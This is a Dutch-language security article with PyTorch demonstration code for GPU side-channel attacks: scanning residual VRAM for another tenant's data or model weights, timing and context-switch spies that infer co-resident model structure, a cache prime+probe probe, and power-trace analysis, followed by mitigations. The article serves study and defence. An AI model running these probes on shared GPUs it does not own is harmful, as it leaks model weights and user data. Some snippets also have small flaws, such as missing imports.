GPU-geheugen side-channelaanvallen
Side-channelaanvallen die GPU-geheugentoewijzing, timing en elektromagnetische emanatie uitbuiten om gevoelige data te onttrekken aan AI-workloads.
Overzicht
GPU's zijn ontworpen voor parallelle berekening, niet voor multi-tenant security-isolatie. Anders dan CPU's, die decennia aan verfijning in geheugenbescherming kennen (virtueel geheugen, paginatabellen, protection rings), is GPU-geheugenbeheer fundamenteel eenvoudiger. NVIDIA-GPU's gebruiken een verenigde VRAM-pool die wordt beheerd door de CUDA-driver, en de isolatiegaranties hangen af van de sharing-modus (exclusive, time-sliced, MPS of MIG).
Dit creëert side-channelmogelijkheden die op CPU's niet bestaan. Wanneer GPU-geheugen wordt toegewezen en vrijgegeven, blijft de data in VRAM staan tot het wordt overschreven. Wanneer meerdere workloads een GPU delen, lekken timingverschillen in geheugenoperaties informatie over andere workloads. Zelfs fysieke side-channels — stroomverbruik en elektromagnetische emanatie — dragen informatie over de berekeningen die op de GPU worden uitgevoerd.
Deze side-channels zijn rechtstreeks relevant voor AI-security omdat AI-workloads gevoelige data verwerken: modelgewichten (intellectueel eigendom), inference-invoer (gebruikersdata, zakelijke queries) en trainingsdata (die PII, medische dossiers of financiële gegevens kan bevatten). Dit artikel behandelt de bekende GPU-side-channelaanvalsklassen, biedt praktische demonstratiecode en evalueert de effectiviteit van beschikbare mitigaties.
De hier beschreven aanvallen putten uit onderzoek waaronder Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018), en Wei et al., "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020).
GPU-geheugenarchitectuur
VRAM-beheer
NVIDIA-GPU's beheren VRAM via de CUDA-driver, die geheugen in blokken toewijst. Anders dan virtueel CPU-geheugen initialiseert GPU-geheugentoewijzing standaard niet in alle contexten op nul. De cudaMalloc van de CUDA-runtime garandeert niet dat toegewezen geheugen wordt gewist, wat betekent dat nieuw toegewezen buffers data van eerdere toewijzingen kunnen bevatten.
import torch
import numpy as np
from typing import Dict, List, Optional, Tuple
class GPUMemoryResidualScanner:
"""
Scan GPU memory for residual data from previous workloads.
Demonstrates the GPU memory residual side channel.
"""
def __init__(self, device: str = "cuda:0"):
self.device = torch.device(device)
if not torch.cuda.is_available():
raise RuntimeError("CUDA is not available")
def allocate_and_scan(
self,
size_mb: int = 256,
num_blocks: int = 10,
) -> List[Dict]:
"""
Allocate GPU memory blocks and check for non-zero residual data.
This demonstrates that GPU memory may contain data from previous
allocations by other processes on the same GPU.
"""
findings = []
for i in range(num_blocks):
# Allocate without initialization
num_elements = (size_mb * 1024 * 1024) // 4 # float32 = 4 bytes
try:
# Use empty (not zeros) to avoid initialization
tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
# Check for non-zero values (residual data)
non_zero_count = torch.count_nonzero(tensor).item()
non_zero_ratio = non_zero_count / num_elements
# Statistical analysis of residual data
if non_zero_count > 0:
non_zero_values = tensor[tensor != 0]
findings.append({
"block": i,
"size_mb": size_mb,
"non_zero_count": non_zero_count,
"non_zero_ratio": non_zero_ratio,
"sample_values": non_zero_values[:10].cpu().tolist(),
"min_value": non_zero_values.min().item(),
"max_value": non_zero_values.max().item(),
"finding": "RESIDUAL_DATA_FOUND",
})
else:
findings.append({
"block": i,
"size_mb": size_mb,
"non_zero_count": 0,
"finding": "CLEAN",
})
del tensor
torch.cuda.empty_cache()
except torch.cuda.OutOfMemoryError:
findings.append({
"block": i,
"finding": "OOM — could not allocate",
})
return findings
def scan_for_model_weights(
self, size_mb: int = 512
) -> Dict:
"""
Attempt to detect residual model weight patterns in GPU memory.
Model weights typically follow specific statistical distributions
(approximately normal for transformer layers).
"""
num_elements = (size_mb * 1024 * 1024) // 4
tensor = torch.empty(num_elements, dtype=torch.float32, device=self.device)
non_zero = tensor[tensor != 0]
if len(non_zero) == 0:
return {"found": False, "detail": "No residual data"}
# Check if the distribution looks like model weights
mean = non_zero.mean().item()
std = non_zero.std().item()
kurtosis_val = ((non_zero - mean) ** 4).mean().item() / (std ** 4) - 3
looks_like_weights = (
abs(mean) < 0.5 # Weights are typically near zero
and 0.001 < std < 1.0 # Reasonable weight scale
and abs(kurtosis_val) < 10 # Not too heavy-tailed
)
del tensor
torch.cuda.empty_cache()
return {
"found": looks_like_weights,
"statistics": {
"mean": mean,
"std": std,
"kurtosis": kurtosis_val,
"sample_size": len(non_zero),
},
"interpretation": (
"Residual data matches typical model weight distribution"
if looks_like_weights
else "Residual data does not match weight patterns"
),
}Geheugentoewijzingstiming
De tijd die nodig is om GPU-geheugen toe te wijzen hangt af van de huidige geheugentoestand, die wordt beïnvloed door andere workloads. Door de toewijzingstiming te meten kan een aanvaller informatie afleiden over co-residente workloads:
import torch
import time
from typing import List, Dict
class GPUTimingSideChannel:
"""
Demonstrate GPU memory timing side channels.
Allocation and computation timing varies based on co-resident workloads.
"""
def __init__(self, device: str = "cuda:0"):
self.device = torch.device(device)
def measure_allocation_timing(
self,
sizes_mb: List[int] = None,
num_samples: int = 100,
) -> List[Dict]:
"""
Measure GPU memory allocation timing at various sizes.
Timing variations can reveal co-resident workload activity.
"""
if sizes_mb is None:
sizes_mb = [1, 10, 50, 100, 500]
results = []
for size_mb in sizes_mb:
num_elements = (size_mb * 1024 * 1024) // 4
timings = []
for _ in range(num_samples):
torch.cuda.synchronize()
start = time.perf_counter_ns()
try:
t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
torch.cuda.synchronize()
elapsed_ns = time.perf_counter_ns() - start
timings.append(elapsed_ns)
del t
torch.cuda.empty_cache()
except torch.cuda.OutOfMemoryError:
break
if timings:
results.append({
"size_mb": size_mb,
"mean_ns": sum(timings) / len(timings),
"min_ns": min(timings),
"max_ns": max(timings),
"std_ns": (
sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
) ** 0.5,
"samples": len(timings),
})
return results
def measure_inference_timing(
self,
model: torch.nn.Module,
input_sizes: List[Tuple[int, ...]],
num_samples: int = 50,
) -> List[Dict]:
"""
Measure inference timing across different input sizes.
Timing reveals information about model architecture.
"""
model.eval()
results = []
for input_size in input_sizes:
timings = []
for _ in range(num_samples):
x = torch.randn(*input_size, device=self.device)
# Warm up
with torch.no_grad():
_ = model(x)
torch.cuda.synchronize()
# Measure
start = time.perf_counter_ns()
with torch.no_grad():
_ = model(x)
torch.cuda.synchronize()
elapsed_ns = time.perf_counter_ns() - start
timings.append(elapsed_ns)
del x
results.append({
"input_size": input_size,
"mean_us": sum(timings) / len(timings) / 1000,
"std_us": (
sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
) ** 0.5 / 1000,
"samples": len(timings),
})
return resultsContext-switching-side-channels
Time-sliced GPU-sharing
Wanneer meerdere processen een GPU delen via time-slicing (de standaard op consumenten-GPU's en veel cloud-instances), wisselt de GPU van context tussen processen. Elke contextwissel veroorzaakt meetbare prestatie-interferentie.
Wei et al. toonden in "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) aan dat een aanvaller, door een spy-proces te draaien dat zijn eigen prestaties tijdens contextwissels monitort, het volgende kan afleiden:
- Of er een neuraal netwerk draait op de gedeelde GPU
- De modelarchitectuur (aantal lagen, laagtypen)
- De eigenschappen van de invoerdata (afbeeldingsdimensies, batchgrootte)
import torch
import time
from typing import Dict, List
class ContextSwitchSpy:
"""
Monitor GPU context switching to infer co-resident workload properties.
Based on concepts from Wei et al. (IEEE DSN 2020).
"""
def __init__(self, device: str = "cuda:0"):
self.device = torch.device(device)
def run_spy_kernel(
self,
duration_seconds: float = 5.0,
probe_size: int = 1024,
) -> List[Dict]:
"""
Run a continuous probe kernel and measure timing variations.
Timing spikes indicate GPU context switches to other workloads.
"""
probe = torch.randn(probe_size, probe_size, device=self.device)
measurements = []
start_time = time.perf_counter()
while time.perf_counter() - start_time < duration_seconds:
torch.cuda.synchronize()
op_start = time.perf_counter_ns()
# Simple matrix multiply as timing probe
result = torch.mm(probe, probe)
torch.cuda.synchronize()
op_end = time.perf_counter_ns()
elapsed_ns = op_end - op_start
measurements.append({
"timestamp_ns": op_start,
"duration_ns": elapsed_ns,
})
del result
# Analyze timing variations
durations = [m["duration_ns"] for m in measurements]
mean_duration = sum(durations) / len(durations)
threshold = mean_duration * 2 # Context switch causes >2x slowdown
context_switches = [
m for m in measurements if m["duration_ns"] > threshold
]
return {
"total_probes": len(measurements),
"mean_duration_ns": mean_duration,
"context_switches_detected": len(context_switches),
"switch_ratio": len(context_switches) / len(measurements) if measurements else 0,
"interpretation": (
"Co-resident GPU workload detected"
if len(context_switches) > len(measurements) * 0.05
else "No significant co-resident activity detected"
),
}
def infer_layer_structure(
self,
measurements: List[Dict],
expected_layer_duration_us: float = 100,
) -> Dict:
"""
Attempt to infer neural network layer structure from timing patterns.
Different layer types (conv, attention, linear) have characteristic timing signatures.
"""
# Group context switch gaps into clusters that may correspond to layers
durations = [m["duration_ns"] for m in measurements]
mean_d = sum(durations) / len(durations)
# Find timing pattern periodicity
anomalies = []
for i, d in enumerate(durations):
if d > mean_d * 1.5:
anomalies.append(i)
if len(anomalies) < 2:
return {"inference_possible": False, "reason": "Insufficient anomaly data"}
# Calculate intervals between anomalies
intervals = [
anomalies[i+1] - anomalies[i]
for i in range(len(anomalies) - 1)
]
# Look for periodicity (suggesting repeated layer execution)
if intervals:
mean_interval = sum(intervals) / len(intervals)
interval_std = (
sum((i - mean_interval)**2 for i in intervals) / len(intervals)
) ** 0.5
periodic = interval_std / mean_interval < 0.3 if mean_interval > 0 else False
return {
"inference_possible": True,
"anomaly_count": len(anomalies),
"mean_interval": mean_interval,
"periodic": periodic,
"estimated_layers": len(anomalies) if periodic else "unknown",
"interpretation": (
f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
if periodic
else "Detected activity but could not determine layer structure"
),
}
return {"inference_possible": False, "reason": "No clear pattern"}Cache-gebaseerde side-channels
GPU-cachecontentie
Moderne GPU's hebben L1- en L2-caches. In gedeelde GPU-omgevingen creëert cachecontentie tussen workloads waarneembare timingverschillen:
import torch
import time
from typing import Dict, List
class GPUCacheSideChannel:
"""
Demonstrate GPU cache-based side channels.
Cache contention from co-resident workloads causes measurable timing variations.
"""
def __init__(self, device: str = "cuda:0"):
self.device = torch.device(device)
def prime_and_probe(
self,
array_size: int = 4 * 1024 * 1024, # 4M elements ~= 16MB at float32
num_rounds: int = 100,
) -> Dict:
"""
GPU adaptation of Prime+Probe cache side channel.
1. Prime: Fill GPU cache with known data
2. Wait: Allow victim to execute (displacing some cache lines)
3. Probe: Measure access time to our cached data
Cache lines displaced by the victim will be slower to access.
"""
# Create a large array that fills the L2 cache
probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
access_pattern = torch.randperm(array_size, device=self.device)[:1024]
baseline_times = []
probe_times = []
for round_idx in range(num_rounds):
# PRIME: Access all elements to fill cache
torch.cuda.synchronize()
_ = probe_array.sum()
torch.cuda.synchronize()
# PROBE (baseline — no victim activity between prime and probe)
start = time.perf_counter_ns()
_ = probe_array[access_pattern].sum()
torch.cuda.synchronize()
baseline_time = time.perf_counter_ns() - start
baseline_times.append(baseline_time)
# PRIME again
_ = probe_array.sum()
torch.cuda.synchronize()
# Small delay to allow potential co-resident activity
time.sleep(0.001)
# PROBE again (after potential victim activity)
start = time.perf_counter_ns()
_ = probe_array[access_pattern].sum()
torch.cuda.synchronize()
probe_time = time.perf_counter_ns() - start
probe_times.append(probe_time)
mean_baseline = sum(baseline_times) / len(baseline_times)
mean_probe = sum(probe_times) / len(probe_times)
return {
"rounds": num_rounds,
"mean_baseline_ns": mean_baseline,
"mean_probe_ns": mean_probe,
"timing_difference_ns": mean_probe - mean_baseline,
"cache_contention_detected": mean_probe > mean_baseline * 1.2,
"contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
}Stroom- en elektromagnetische side-channels
GPU-stroomverbruik correleert met rekenkundige activiteit. Onderzoek heeft aangetoond dat stroomtraces het volgende kunnen onthullen:
- Of de GPU matrixvermenigvuldiging uitvoert (training/inference) versus geheugenoperaties
- De grootte van de matrices die worden berekend
- Mogelijk de waarden die worden verwerkt (in extreme gevallen met hoge-resolutiemetingen)
Deze aanvallen vereisen fysieke toegang tot stroommeetpunten of elektromagnetische probes nabij de GPU, waardoor ze vooral relevant zijn voor:
- Gedeelde fysieke infrastructuur (colocatie-datacenters)
- Edge-AI-apparaten waar een aanvaller fysieke toegang heeft
- Supply-chain-aanvallen waarbij monitoringhardware is geïmplanteerd
from typing import Dict, List, Optional
from dataclasses import dataclass
@dataclass
class PowerMeasurement:
"""Simulated GPU power measurement data point."""
timestamp_us: float
power_watts: float
gpu_utilization_pct: float
class PowerSideChannelAnalyzer:
"""
Analyze GPU power consumption traces for information leakage.
In practice, power measurements come from:
- nvidia-smi (low resolution, ~1 second)
- NVML API (higher resolution, ~100ms)
- External power meters (highest resolution)
"""
def analyze_power_trace(
self,
measurements: List[PowerMeasurement],
) -> Dict:
"""Analyze a power consumption trace for patterns."""
if not measurements:
return {"analysis": "no_data"}
powers = [m.power_watts for m in measurements]
timestamps = [m.timestamp_us for m in measurements]
# Detect computation phases
mean_power = sum(powers) / len(powers)
phases = []
current_phase = "idle" if powers[0] < mean_power else "active"
phase_start = 0
for i in range(1, len(powers)):
new_phase = "idle" if powers[i] < mean_power * 0.8 else "active"
if new_phase != current_phase:
phases.append({
"type": current_phase,
"start_idx": phase_start,
"end_idx": i,
"duration_us": timestamps[i] - timestamps[phase_start],
"mean_power": sum(powers[phase_start:i]) / (i - phase_start),
})
current_phase = new_phase
phase_start = i
active_phases = [p for p in phases if p["type"] == "active"]
return {
"total_measurements": len(measurements),
"mean_power_watts": mean_power,
"max_power_watts": max(powers),
"min_power_watts": min(powers),
"computation_phases": len(active_phases),
"phase_details": active_phases[:10],
"interpretation": (
f"Detected {len(active_phases)} computation phases — "
"may correspond to model layers or inference batches"
),
}
def detect_model_architecture_from_power(
self, phases: List[Dict]
) -> Dict:
"""
Attempt to infer model architecture from power consumption patterns.
Different layer types have characteristic power signatures.
"""
if len(phases) < 3:
return {"inference_possible": False}
# Attention layers: high power, longer duration
# Linear layers: moderate power, shorter duration
# Normalization: low power, very short duration
layer_classifications = []
for phase in phases:
power = phase.get("mean_power", 0)
duration = phase.get("duration_us", 0)
if power > 250 and duration > 1000:
layer_classifications.append("attention_or_matmul")
elif power > 150 and duration > 500:
layer_classifications.append("linear")
elif duration < 200:
layer_classifications.append("normalization_or_activation")
else:
layer_classifications.append("unknown")
return {
"inference_possible": True,
"estimated_layers": len(layer_classifications),
"layer_types": layer_classifications,
"attention_layers": layer_classifications.count("attention_or_matmul"),
"linear_layers": layer_classifications.count("linear"),
}Mitigaties
Softwarematige mitigaties
import torch
from typing import Optional
class GPUSideChannelMitigation:
"""Software mitigations for GPU side-channel attacks."""
@staticmethod
def secure_allocate(
size: tuple,
dtype: torch.dtype = torch.float32,
device: str = "cuda:0",
) -> torch.Tensor:
"""Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
tensor = torch.zeros(size, dtype=dtype, device=torch.device(device))
return tensor
@staticmethod
def secure_deallocate(tensor: torch.Tensor) -> None:
"""Securely deallocate a tensor by overwriting with zeros before freeing."""
if tensor.is_cuda:
tensor.zero_()
torch.cuda.synchronize()
del tensor
torch.cuda.empty_cache()
@staticmethod
def add_timing_noise(
min_delay_ms: float = 0.1,
max_delay_ms: float = 1.0,
) -> None:
"""
Add random timing noise to inference operations.
Makes timing side channels less reliable.
"""
import random
delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
time.sleep(delay)
@staticmethod
def constant_time_inference(
model: torch.nn.Module,
input_tensor: torch.Tensor,
fixed_duration_ms: float = 100,
) -> torch.Tensor:
"""
Execute inference and pad to a fixed duration.
Prevents timing side channels by making all inferences take the same time.
"""
start = time.perf_counter()
with torch.no_grad():
output = model(input_tensor)
torch.cuda.synchronize()
elapsed_ms = (time.perf_counter() - start) * 1000
remaining_ms = fixed_duration_ms - elapsed_ms
if remaining_ms > 0:
time.sleep(remaining_ms / 1000)
return outputHardwarematige mitigaties
| Mitigatie | Effectiviteit | Prestatie-impact | Beschikbaarheid |
|---|---|---|---|
| MIG (Multi-Instance GPU) | Hoog — hardware-isolatie | Vermindert reken per instance | A100, H100 |
| NVIDIA Confidential Computing | Zeer hoog — versleuteld GPU-geheugen | 5-15% overhead | H100 |
| GPU-geheugenscrubbing | Gemiddeld — verwijdert residuen | Voegt toewijzingslatentie toe | Softwarematig configureerbaar |
| Aparte GPU per workload | Volledig — geen sharing | Duur | Elke GPU |
| IOMMU | Gemiddeld — voorkomt DMA-aanvallen | Minimaal | Afhankelijk van CPU/chipset |
Defensieve aanbevelingen
- Gebruik MIG voor multi-tenant GPU-omgevingen om hardware-afgedwongen geheugenisolatie te bereiken
- Initialiseer GPU-geheugen op nul bij toewijzing om residu-datalekkage te voorkomen
- Vul GPU-geheugen met nullen voordat je gevoelige tensors vrijgeeft
- Gebruik NVIDIA Confidential Computing (H100) voor gevoelige inference-workloads
- Vermijd GPU-time-slicing voor security-gevoelige workloads — gebruik dedicated GPU's of MIG-instances
- Voeg timing-ruis toe aan inference-operaties om timing-side-channels te verslaan
- Monitor GPU-stroomverbruik op afwijkende patronen die op een side-channelaanval kunnen wijzen
- Schakel IOMMU in om DMA-gebaseerde geheugentoegang vanuit gecompromitteerde GPU-workloads te voorkomen
Referenties
- Naghibijouybari et al. — "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018) — foundational GPU side channel research
- Wei et al. — "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) — model architecture inference from context switching
- Zhu et al. — "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021) — model extraction via GPU side channels
- NVIDIA Multi-Instance GPU — https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
- NVIDIA Confidential Computing — https://developer.nvidia.com/confidential-computing
- MITRE ATLAS — AML.T0024 (Exfiltration via ML Inference API)